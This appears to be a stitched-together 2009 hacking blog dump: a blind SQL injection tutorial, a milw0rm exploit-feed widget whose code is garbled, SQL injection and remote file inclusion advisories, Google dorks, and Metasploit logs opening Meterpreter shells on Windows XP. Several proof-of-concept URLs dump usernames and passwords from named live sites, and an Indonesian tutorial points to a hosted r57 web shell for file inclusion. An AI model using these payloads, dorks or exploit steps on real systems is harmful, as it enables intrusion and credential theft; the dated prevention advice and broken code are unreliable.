SUBSTR() is a synonym for SUBSTRING().

mysql> select substring('Blind SQL', 1, 1);
----------------------------
| substring('Blind SQL', 1, 1) |
----------------------------
| B |
----------------------------

mysql> select substring('Blind SQL', 2, 1);
----------------------------
| substring('Blind SQL', 2, 1) |
----------------------------
| l |
----------------------------

- LOWER(str)

Returns the string str with all characters changed to lowercase according to
the current character set mapping. The default is latin1 (cp1252 West European).

mysql> SELECT LOWER('SQL');
----------------
| LOWER('SQL') |
----------------
| sql |
----------------

- UPPER(str)

Returns the string str with all characters changed to uppercase according to
the current character set mapping. The default is latin1 (cp1252 West European).

mysql> SELECT UPPER('sql');
--------------
| UPPER('sql') |
--------------
| SQL |
--------------

Now we have understood the principals MySQL functions that could be used while
trying to do a Blind SQL Injection attack. (consult MySQL reference manuals for others)

What we need again? Suppose that we know for a moment the admin password: "secret".

mysql> select ascii('s');
-----------
| ascii('s') |
-----------
| 115|
-----------

mysql> select ascii('e');
-----------
| ascii('e') |
-----------
| 101|
-----------

mysql> select ascii('c');
-----------
| ascii('c') |
-----------
| 99 |
-----------

mysql> select ascii('r');
-----------
| ascii('r') |
-----------
| 114|
-----------

mysql> select ascii('t');
-----------
| ascii('t') |
-----------
| 116|
-----------

It's time to watch the source code:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

[ ... ]

$SQL = "select * from news where id=".$_GET['id']." LIMIT 1";

$result = mysql_query($SQL);

if (!$result) {
die('Invalid query: ' . mysql_error());
}

[ ... ]

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

Now, try to "exploit the bug" by requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) = 115

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

The query is TRUE (we know that the first letter of the password is 's') and therefore, the query will be:

SELECT * FROM news WHERE id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) = 115 LIMIT 1

What is the number 115? Read upon is the ascii value of the 's'. We retrieved the first character
of the password (by using some MySQL functions).

.:. (SELECT pwd FROM usr WHERE id=1) => SELECT the password of the user with ID=1 (admin)
.:. (SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1) => Get the first letter of the password (in this case 's')
.:. ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) => Get the ASCII code of the first letter (115 in this case)

And how to retrieve the second letter of the password? Just carry out this query:

SELECT * FROM news WHERE id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),2,1)) = 101 LIMIT 1

by requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),2,1)) = 101

The third character? And the others? Just make the same query with the right values.
Take in mind that you can also use the "greater then" (>) and "less then" (<) symbols
instead of the equal; to find the ASCII letter between a range of letters.
Eg.: between 100 and 116; and so on.
-------------------------------------------------------------------------------[/]

---[ 0x07: Double Query ]

Sometimes in some codes happends that a programmer use the MySQLi Class (MySQL Improved
Extension) that is an extension allows you to access to the functionality provided
by MySQL 4.1 and above.

I'll explain a very interesting bug that could be very dangerous for the
system. A not properly sanitized variable passed in the method called multi_query of
the mysqli class can be used to perform a "double" sql query injection.

mysqli_multi_query (PHP 5) is able to performs one or more queries on the
database selected. The queries executed are concatenated by a semicolon.

Look this example to know what I'm talking about:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

$mysqli = new mysqli("localhost", "root", "root", "test");

if (mysqli_connect_errno()) {
printf("Connect failed: %s\n", mysqli_connect_error());
exit();
}

$query = "SELECT user FROM usr WHERE id =". $_GET['id'].";";
$query .= "SELECT texts FROM news WHERE id =". $_GET['id'];

echo 'UserName: ';

if ($mysqli->multi_query($query)) {
do {
/* the first result set */
if ($result = $mysqli->store_result()) {
while ($row = $result->fetch_row()) {
echo " - " .$row[0]. "
" ;
}
$result->free();
}
/* print divider */
if ($mysqli->more_results()) {
echo "/-/-/-/-/-/-/-/-/-/-/-/-/-/
";
}
} while ($mysqli->next_result());
}

/* close connection */
$mysqli->close();
?>

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

If a user request the follow URL:

http://www.victim.net/CMS/multiple.php?id=2

The browser reply with this information:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

UserName: - ad
/-/-/-/-/-/-/-/-/-/-/-/-/-/
- could be bypassed easily?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

But the source code is bugged. The $query variable is vulnerable because
a user can supply using the GET method, an evil id and can do multiple (evil) queries.

Trying with this request:

http://localhost/apache2-default/multiple1.php?id=2; SELECT pwd FROM usr/*

We will obtain the users passwords.

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

UserName: - ad
/-/-/-/-/-/-/-/-/-/-/-/-/-/
- secret
- adpwd
- test

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
-------------------------------------------------------------------------------[/]

---[ 0x08: Filters Evasion ]

Web Application could implements some input filters that prevent an attacker from
exploiting certain flaws such as SQL Injection, LFI or whatever. Therefore an application
can use some mechanism that are able to sanitize, block or parse in some ways
user-supply data. This kind of filters could be bypassed by using differents methods,
here I wanna try to give to you some ideas; but certainly one filter differ from
an other one so, you have to try/find different methods to bypass it.

- Imagine that we have to bypass a login form; but the comment symbol is blocked,
we can bypass this issue but injecting this data ' OR 'a' = 'a instead of ' OR 1 = 1 /*

- The filter try to prevent an SQL Injection by using this kind of Signature: ' or 1=1 (Case-insensitive).
An attacker can bypass this filter using ' OR 'foobar' = 'foobar for example.

- Suppose that the application filter the keyword "admin", to bypass this filter we have just
to use some MySQL functions such as CONCAT or CHAR for example:
union select * from usr where user = concat('adm','in')/*
union select * from usr where user=char(97,100,109,105,110)/*

This is only a little part of "filter evasion techniques". Different filters work
differently, I can't stay on this topic forever; I just gave to you some ideas.
-------------------------------------------------------------------------------[/]

---[ 0x09: SQL Injection Prevention ]

How to prevent this type of attacks? Here below I just wanna write some
tips that you can use to make your web application more secure.

1.) The file php.ini located on our HD (/etc/php5/apache2/php.ini, /etc/apache2/php.ini,
and so on..) can help us with the magic quote functions. Other interesting functions can
be setted to On; take a look inside this file.

Magic quotes can be used to escape automatically with backslash the user-supply single-quote ('),
double-quote ("), backslash (\) and NULL characters.
The 3 magic quotes directives are:

- magic_quotes_gpc, that affects HTTP request data such as GET, POST and COOKIE.
- magic_quotes_runtime, if enabled, most functions that return data from an external source, will have
quotes escaped with a backslash.
- magic_quotes_sybase, that escape the ' with '' instead of \'.

2.) deploy mod_security for example

3.) use functions such as addslashes() htmlspecialchars(), mysql_escape_string(), etc. to validate
every user inputs.

4.) For integer input validate it by casting the variable
-------------------------------------------------------------------------------[/]

---[ 0x10: Conclusion ]

Here we are, at the end of this paper. As said upon, I hope you enjoyed it and
for any questions please mail me.
-------------------------------------------------------------------------------[/]

milw0rm Javascript Content Parser v3.0

2009-08-05T22:22:00.000-07:00

Changes:
*AJAX rendering techniques
*Browser compliance! designed for Internet Explorer 6 & 7, Firefox, Opera, Seamonkey, Safari
*The code is smaller, I made it too big of useless stuffs in 2.0
*The javascript does no more act on the page loading time if the source feed is offline or timeout, simply choose when it will load the remote feed by adding update_ModuleX(); anywhere on your page, preferably in the footer.
*PHP proxy (this is optional, see post #2 in this thread)

What is it:

This is a simple javascript code wich you can copy and paste on your website to stay informed about the various public exploits, I have started building it 2 years ago from a basic code made by sophos, then with str0ke's cooperation I have got the idea to port it for milw0rm, rewriting it with AJAX styles, and that's what it is now. I think I won't update it much because it is now perfectly running, maybe a few minor updates to enhance the browsers compatibilities.

How to use it:

The code below is the sample code for the remote exploits section in milw0rm, if you would like to display other sections like dos, local, webapps, just change the configuration settings in the header of the code and replace all occurences of milalerts1 to the milalerts# defined for each sections, you should know that they are defined like this on milw0rm.com:

remote exploits = milalerts1
local exploits = milalerts2
webapps exploits = milalerts3
dos exploits = milalerts4

You must have only 10 occurences to change, with a quick editor that's fast to achieve.

//update:
I have forgot to mention, if you would like to display several milw0rm modules on a same web page, you must think to rename all occurences of _Module1 to _Module# where # is a unique number from 2 to 4 for example, this will work around some functions that could be mixed between each modules.

Code:

PHP Code:



<script type="text/javascript">



// Layout settings

var feed_Module1              = 'http://milw0rm.com/js/3.0/remote.php'               // news url

var table_border_Module1      = '0'               // table border size (default:0)

var table_width_Module1       = '175'             // table width, in % or px (default:100%)

var table_cspacing_Module1    = '1'               // table cellspacing (default:1)

var table_cpadding_Module1    = '0'               // table cellpadding (default:0)

var table_bgcolour_Module1    = '#000000'         // table background colour (default:#000000)

var table_bdcolour_Module1    = '#000000'         // table border colour (default:#000000)

var table_bgpic_Module1       = ''                // table background picture (default:none)

var table_align_Module1       = 'left'            // table horizontal alignement, LEFT | RIGHT (default:left)

var table_hspace_Module1      = '0'               // table horizontal space (default:0)

var table_vspace_Module1      = '0'               // table vertical space (default:0)

var table_height_Module1      = '0'               // table height (default:0)

var header_align_Module1      = 'left'            // header horizontal alignement, LEFT | CENTER | MIDDLE | RIGHT (default:left)

var header_valign_Module1     = ''                // header vertical alignement, TOP | MIDDLE | CENTER | BOTTOM | BASELINE (default:none)

var header_height_Module1     = '0'               // header height (default:0)

var header_bgcolour_Module1   = '#000000'         // header background colour (default:#000000)

var header_tcolour_Module1    = '#FFFFFF'         // header text colour (default:#FFFFFF)

var header_ttheme_Module1     = ''                // header text theme (default:Eras Medium ITC)

var header_tsize_Module1      = '1'               // header text size (default:0)

var header_title1_Module1     = 'remote exploits' // header plural title

var header_title2_Module1     = 'remote exploit'  // header singular title

var column1_align_Module1     = 'center'          // column1 alignement, LEFT | CENTER | MIDDLE | RIGHT (default:center)

var column1_valign_Module1    = ''                // column1 vertical alignement, TOP | MIDDLE | CENTER | BOTTOM | BASELINE (default:none)

var column1_height_Module1    = '0'               // column1 height (default:0)

var column1_bgcolour_Module1  = '#918484'         // column1 background colour (default:#918484)

var column1_tcolour_Module1   = '#000000'         // column1 text colour (default:#000000)

var column1_ttheme_Module1    = ''                // column1 text theme (default:Arial Narrow)

var column1_tsize_Module1     = '1'               // column1 text size (default:0)

var column2_width_Module1     = ''                // column2 width, in % or px (default:90%)

var column2_align_Module1     = 'left'            // column2 horizontal alignement, LEFT | CENTER | MIDDLE | RIGHT (default:left)

var column2_valign_Module1    = ''                // column2 vertical alignement, TOP | MIDDLE | CENTER | BOTTOM | BASELINE (default:none)

var column2_height_Module1    = '0'               // column2 height (default:0)

var column2_bgcolour_Module1  = '#004000'         // column2 background colour (default:#004000)

var column2_tcolour_Module1   = '#00C000'         // column2 text colour (default:#00C000)

var column2_hcolour_Module1   = '#D6EF39'         // column2 highlight color, to highlight newly added milw0rm exploits (default:#D6EF39)

var column2_ttheme_Module1    = ''                // column2 header text theme (default:Arial Narrow)

var column2_tsize_Module1     = '1'               // column2 text size (default:0)



// Functional settings

var count_column_Module1      = '2'               // column count, 1 or 2 (default:2)

var count_Module1             =  10               // news count, 1 to 10 (default:10)

var adjust_length_Module1     = 'no'              // news length correction 'yes' or 'no' (default:yes)

var adjust_var_Module1        =  55               // maximum characters count after what the correction is made (default:75)



// **********************no modifications required after*******************************

var b_Module1 = '..';

var htmltxt_Module1 = "";

var base_colour_Module1 = column2_tcolour_Module1;

var font_header_Module1 = '+ header_tsize_Module1 + '" face="' + header_ttheme_Module1 + '" color="' + header_tcolour_Module1 + '">';

var font_column1_Module1 = '+ column1_tsize_Module1 + '" face="' + column1_ttheme_Module1 + '" color="' + column1_tcolour_Module1 + '">';

var font_column2_Module1 = '+ column2_tsize_Module1 + '" face="' + column2_ttheme_Module1 + '" color="' + column2_tcolour_Module1 + '">';

var milalerts1;



function wait_Module1(millis_Module1)

{

  var date_Module1 = new Date();

  var curDate_Module1 = null;

  do { curDate_Module1 = new Date(); }

  while(curDate_Module1-date_Module1 < millis_Module1);

}



function error_Module1()

{

  for (var lid_Module1=1,i_Module1=0;i_Module1<10;i_Module1++,lid_Module1++)

  {

    document.getElementById('link_Module1'+ lid_Module1).innerHTML= font_column2_Module1 + 'Timeout, refresh';

  }

  return;

}



function refresh_Module1()

{

  for (var lid_Module1=1,i_Module1=0;i_Module1<40;i_Module1+=4,lid_Module1++)

  {

    document.getElementById('link_Module1'+ lid_Module1).innerHTML= font_column2_Module1 + 'Refreshing...';

  }

  update_Module1();

  return;

}



function update_Module1()

{

  wait_Module1(0);

  scriptTag_Module1 = document.getElementById('Script_Module1');

  headID_Module1 = document.getElementsByTagName("head")[0];

  if(scriptTag_Module1) {headID_Module1.removeChild(document.getElementById('Script_Module1'));}

  newScript_Module1 = document.createElement('script');

  newScript_Module1.type = 'text/javascript';

  newScript_Module1.src = feed_Module1 + "?" + Math.random(); //IE7 refresh patch to avoid caching

  newScript_Module1.id = 'Script_Module1';

  newScript_Module1.defer = false;

  headID_Module1.appendChild(newScript_Module1);

  newScript_Module1.onreadystatechange=function() {

    if(newScript_Module1.readyState=="loaded"){

      scriptLoaded_Module1();

      return;

    }

  }

  newScript_Module1.onload=function() {

      scriptLoaded_Module1();

      return;

  }

  if(newScript_Module1.readyState=="loaded") { //Opera patch

    scriptLoaded_Module1();

    return;

  }

  return;

}



function scriptLoaded_Module1()

{

  wait_Module1(100);

  if (milalerts1==null) {

    error_Module1();

    return;

  }

  for (var lid_Module1=1,i_Module1=0;i_Module1<40;i_Module1+=4,lid_Module1++)

  {

    if (milalerts1[i_Module1+3]=='1'){ column2_tcolour_Module1 = column2_hcolour_Module1;font_column2_Module1 = '+ column2_tsize_Module1 + '" face="' + column2_ttheme_Module1 + '" color="' + column2_tcolour_Module1 + '">'; }

    if (adjust_length_Module1 == "yes")

    {

      var a_Module1 = milalerts1[i_Module1+1];

      if (a_Module1.length > adjust_var_Module1)

        document.getElementById('link_Module1'+ lid_Module1).innerHTML='+ milalerts1[i_Module1+2] + '" target="_blank" style="text-decoration: none">' + font_column2_Module1 + a_Module1.substr(0,adjust_var_Module1) + b_Module1 + '';

      else

        document.getElementById('link_Module1'+ lid_Module1).innerHTML='+ milalerts1[i_Module1+2] + '" target="_blank" style="text-decoration: none">' + font_column2_Module1 + milalerts1[i_Module1+1] + '';

    }

    else

      document.getElementById('link_Module1'+ lid_Module1).innerHTML='+ milalerts1[i_Module1+2] + '" target="_blank" style="text-decoration: none">' + font_column2_Module1 + milalerts1[i_Module1+1] + '';



    if (count_column_Module1 != "1")

    {

      document.getElementById('date_Module1'+ lid_Module1).innerHTML='' + font_column1_Module1 + milalerts1[i_Module1+0] + '';

    }

    column2_tcolour_Module1 = base_colour_Module1;

    font_column2_Module1 = '+ column2_tsize_Module1 + '" face="' + column2_ttheme_Module1 + '" color="' + column2_tcolour_Module1 + '">';

  }

  lid_Module1=1;

  i_Module1=0;

  return;

}



if (count_column_Module1 == "1") { colspan_Module1 = 1; }

else { colspan_Module1 = 2; }



if (count_Module1 > 0)

{

  if (count_Module1 > 10) {count_Module1 = 10}



  htmltxt_Module1 +=

  '\n+ table_align_Module1 +

  '" width="' + table_width_Module1 +

  '" cellspacing="' + table_cspacing_Module1 +

  '" cellpadding="' + table_cpadding_Module1 +

  '" border="' + table_border_Module1 +

  '" bordercolor="' + table_bdcolour_Module1 +

  '" bgcolor="' + table_bgcolour_Module1 +

  '" background="' + table_bgpic_Module1 +

  '" hspace="' + table_hspace_Module1 +

  '" vspace="' + table_vspace_Module1 +

  '" height="' + table_height_Module1 +

  '">';



  htmltxt_Module1 +=

  '\n";

  }

  else

  {

    htmltxt_Module1 +=

    'Latest ' + count_Module1 + ' ' + header_title1_Module1 +

    "from milw0rm";

  }



  for (var i_Module1=0, lid_Module1=1; i_Module1<count_Module1*4; i_Module1+=4, lid_Module1++)

  {

    if (count_column_Module1 == "1")

    {

      htmltxt_Module1 +=

      '\n';

      column1_tcolour_Module1 = base_colour_Module1;

      font_column1_Module1 = '+ column1_tsize_Module1 + '" face="' + column1_ttheme_Module1 + '" color="' + column1_tcolour_Module1 + '">';

    }

    else

    {

      htmltxt_Module1 +=

      '\n';

      column2_tcolour_Module1 = base_colour_Module1;

      font_column2_Module1 = '+ column2_tsize_Module1 + '" face="' + column2_ttheme_Module1 + '" color="' + column2_tcolour_Module1 + '">';

    }

  }

}

else

{

  document.write("=== MILW0RM info feed error: Specify value of count > 0 ===");

}



htmltxt_Module1 += '\n+ header_align_Module1 +

  '" valign="' + header_valign_Module1 +

  '" height="' + header_height_Module1 +

  '" colspan="' + colspan_Module1 +

  '" bgcolor="' + header_bgcolour_Module1 +

  '">' + font_header_Module1 +

  '' + font_header_Module1 +

  '|about' + font_header_Module1 +

  'refresh';



  if (count_Module1 == 1)

  {

    htmltxt_Module1 +=

    'Latest ' + header_title2_Module1 +

    "from milw0rm
+ column2_align_Module1 +

      '" valign="' + column2_valign_Module1 +

      '" height="' + column2_height_Module1 +

      '" bgcolor="' + column2_bgcolour_Module1 +

      '">+ lid_Module1 +

      '">' + font_column2_Module1 +

      'Updating...
+ column1_align_Module1 +

      '" valign="' + column1_valign_Module1 +

      '" height="' + column1_height_Module1 +

      '" bgcolor="' + column1_bgcolour_Module1 +

      '">' + font_column1_Module1 +

      '+lid_Module1+'">' + lid_Module1 +

      ' + column2_align_Module1 +

      '" valign="' + column2_valign_Module1 +

      '" height="' + column2_height_Module1 +

      '" width="' + column2_width_Module1 +

      '" bgcolor="' + column2_bgcolour_Module1 +

      '">+ lid_Module1 +

      '">' + font_column2_Module1 +

      'Updating...
';



document.write(htmltxt_Module1);

update_Module1();

linkSpheric 0.74 Beta 6 SQL Injection Vuln

2009-08-04T08:01:00.001-07:00

[o] linkSpheric 0.74 Beta 6 SQL Injection Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Author : NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o] Dork
"Powered by linkSpheric"

Metasploit Proof of Concept [ Linux ]

2009-08-04T06:16:00.000-07:00

this is an old exploit but still works
i have test it on Local Area Network here
this exploit tested on Windows XP Service Pack 1

[o] DCOM RPC Exploit (ms03_026_dcom)

# Description
This module exploits a stack overflow in the RPCSS service, this
vulnerability was originally found by the Last Stage of Delirium
research group and has bee widely exploited ever since. This module
can exploit the English versions of Windows NT 4.0 SP3-6a, Windows
2000, Windows XP, and Windows 2003 all in one request :)

root@ubuntu:~# ping 172.16.1.31
PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.
64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms
64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms
64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms
^C
--- 172.16.1.31 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms

root@ubuntu:~# nmap -O -PN 172.16.1.31

Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT
Interesting ports on ******-******.kapukvalley.net (172.16.1.31):
Not shown: 1710 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open upnp
MAC Address: 00:1C:F0:5A:98:AF (D-Link)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds

root@ubuntu:~# cd /home/noge/pentest/metasploit/
root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole

| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|

=[ msf v3.3-dev
+ -- --=[ 378 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 154 aux

msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 135 yes The target port

Payload options (windows/meterpreter/bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address

Exploit target:

Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms03_026_dcom) > set TARGET 0
TARGET => 0
msf exploit(ms03_026_dcom) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.1.31 yes The target address
RPORT 135 yes The target port

Payload options (windows/meterpreter/bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 172.16.1.31 no The target address

Exploit target:

Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) > exploit

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Sending exploit ...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] The DCERPC service did not reply to our request
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444)

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >

=============================================================================================
=============================================================================================

[o] KILLBILL SMB Exploit (ms04_007_killbill)

# Description
This is an exploit for a previously undisclosed vulnerability in the
bit string decoding code in the Microsoft ASN.1 library. This
vulnerability is not related to the bit string vulnerability
described in eEye advisory AD20040210-2. Both vulnerabilities were
fixed in the MS04-007 patch. You are only allowed one attempt with
this vulnerability. If the payload fails to execute, the LSASS
system service will crash and the target system will automatically
reboot itself in 60 seconds. If the payload succeeeds, the system
will no longer be able to process authentication requests, denying
all attempts to login through SMB or at the console. A reboot is
required to restore proper functioning of an exploited system. This
exploit has been successfully tested with the win32/*/reverse_tcp
payloads, however a few problems were encounted when using the
equivalent bind payloads. Your mileage may vary.

msf > use windows/smb/ms04_007_killbill
msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_007_killbill) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST yes The target address
RPORT 445 yes Set the SMB service port

Payload options (windows/meterpreter/bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address

Exploit target:

Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms04_007_killbill) > show targets

Exploit targets:

Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0
msf exploit(ms04_007_killbill) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST 172.16.1.31 yes The target address
RPORT 445 yes Set the SMB service port

Payload options (windows/meterpreter/bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 172.16.1.31 no The target address

Exploit target:

Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > exploit

[*] Started bind handler
[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444)

meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >

RFI

2009-07-31T01:12:00.000-07:00

terima kasih teman2 ku yg mau berkunjung ke blog aq

saya akan menjelaskan RFI, RFI adalah salah satu cara dalam penetrasi sebuah server melalui port 80

tanpa panjang lebar langsung praktek yah

contoh:
- Dork <==== adalah sebuah cara dalam mendapatkan target (artinya keyword yg kita
ketik di mesin pencari seperti google)
- Vulnerable file <==== adalah sebuah file dimana ada celah keamanan

contoh
Dork "Powered by MiniCWB"

Vulnerable file :
language/en.inc.php
language/hu.inc.php
language/no.inc.php
language/ro.inc.php
language/ru.inc.php

- dari data diatas kalian coba ketik digoogle ke dari dark tersebut
- maka akan banyak muncul web2 yang memiliki kelemahan dari file tersebut
- ambil web target yg diinginkan (copy linknya jgn diklik)
- edit link target yang diinginkan

http://localhost/[path]/language/en.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/hu.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/no.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ro.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ru.inc.php?LANG=[evilc0de]

[evilc0de] adalah sebuah script yg disisipkan di web yg kita punya

contoh script g saya punya : http://geocities.com/anggri_yanto/r57.txt

-jgn lp diakhiri tanda tanya untuk agar dieksekusi

Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability

2009-07-31T01:07:00.001-07:00

Software : Ultrize TimeSheet version 1.2.2
Vendor : http://www.ultrize.com/
Download : http://www.ultrize.com/timesheet/download/timeSheet-20080505.zip
Author : NoGe

=====================================================================================

[o] Vulnerable file

include($config['include_dir'].'timesheet.class.php');

include/timesheet.php

[o] Exploit

http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]

=====================================================================================

justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities

2009-07-31T01:06:00.000-07:00

#################################################################################################################
[+] justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
##################################################################################################################

[+] Download : http://www.fh54.de/justVisual/justVisual_1.2.zip

[+] Remote File Inclusion

- Vulnerable code is everywhere

- PoC's

http://127.0.0.1/path/justVisual/sites/site/pages/index.php?fs_jVroot=http://evilsite.com/evilscript.txt

http://127.0.0.1/path/justVisual/sites/test/pages/contact.php?fs_jVroot=http://evilsite.com/evilscript.txt

http://127.0.0.1/path/justVisual/system/pageTemplate.php?fs_jVroot=http://evilsite.com/evilscript.txt

http://127.0.0.1/path/justVisual/system/utilities.php?fs_jVroot=http://evilsite.com/evilscript.txt

##################################################################################################################

# milw0rm.com [2009-07-30]

2009-07-31T00:36:00.000-07:00

linkSpheric 0.74 Beta 6 SQL Inejction Vuln

Thursday, July 31, 2009

[o] linkSpheric 0.74 Beta 6 SQL Inejction Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Referensi: NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o] Dork
"Powered by linkSpheric"

+ header_align_Module1 + '" valign="' + header_valign_Module1 + '" height="' + header_height_Module1 + '" colspan="' + colspan_Module1 + '" bgcolor="' + header_bgcolour_Module1 + '">' + font_header_Module1 + '' + font_header_Module1 + '\|about ' + font_header_Module1 + 'refresh'; if (count_Module1 == 1) { htmltxt_Module1 += 'Latest ' + header_title2_Module1 + "from milw0rm
+ column2_align_Module1 + '" valign="' + column2_valign_Module1 + '" height="' + column2_height_Module1 + '" bgcolor="' + column2_bgcolour_Module1 + '"> + lid_Module1 + '">' + font_column2_Module1 + 'Updating...
